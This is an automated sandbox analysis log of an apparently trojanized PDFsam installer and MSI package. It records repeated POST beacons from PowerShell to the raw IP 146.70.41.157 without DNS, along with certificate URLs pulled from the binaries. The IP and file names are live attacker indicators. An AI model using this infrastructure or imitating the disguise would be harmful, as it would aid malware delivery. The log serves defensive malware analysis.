                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 644
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 713
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 303
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 416
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 453
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 567
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 259
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 317
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 636
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 286
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 480
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 254
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 316
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 375
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 711
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 731
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 631
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 284
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 404
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 611
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 639
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 301
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 728
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 395Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 561
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 363
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 259
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 325
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 615
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 423
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 516
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 271
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 471
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 505
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 427
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 513
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 601
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 445
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 719
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 719
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 364
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 425
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 343
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 470
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 745
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 632
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 555
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 706
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 495
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 514
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 326
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 545
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 310
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 504
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 528
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 634
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 453
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 694
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 678
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 318
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 260
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 278
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 350
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 393
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 672
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 360
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 712
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 274
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 429
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 581
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 272
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 335
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 385
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 247
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 561
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 569
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 581
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 521
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 479
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 668
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 522
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 410
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 711
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 645
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 531
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 273
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 623
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 461
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 403
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://%s:%d;https=https://%s:%dHTTP/1.0Content-Encodingdeflategzip%u.%u.%u.%u01234567890123456789ab
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://%s:%dhttp://schemas.xmlsoap.org/soap/envelope/EnvelopeBodyHeaderFaultfaultcodefaultstringfaul
                        Source: powershell.exe, 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, powershell.exe, 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmpString found in binary or memory: http://146.70.41.157
                        Source: powershell.exe, 00000015.00000003.919044923.00000273C99C3000.00000004.00000001.sdmpString found in binary or memory: http://146.70.41.157/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694668021.0000000004A4A000.00000004.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694486608.0000000004FF1000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.982583844.00000273C9730000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694668021.0000000004A4A000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com9
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.939664448.00000273AF6D5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975574772.0000000002850000.00000004.00000040.sdmpString found in binary or memory: http://crl.u
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.1019284538.00000000088D8000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredID
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
                        Source: 5206a8.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: 5206a8.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694254570.0000000004A34000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694254570.0000000004A34000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/S
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://emcosoftware.com
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://jtracking-gate.lulusoft.comhttps://jtracking-gate.lulusoft.comIE
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.accv.es0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://ocsp.digicert.com0I
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://ocsp.digicert.com0O
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://ocsp.digicert.com0P
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://ocsp.digicert.com0R
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
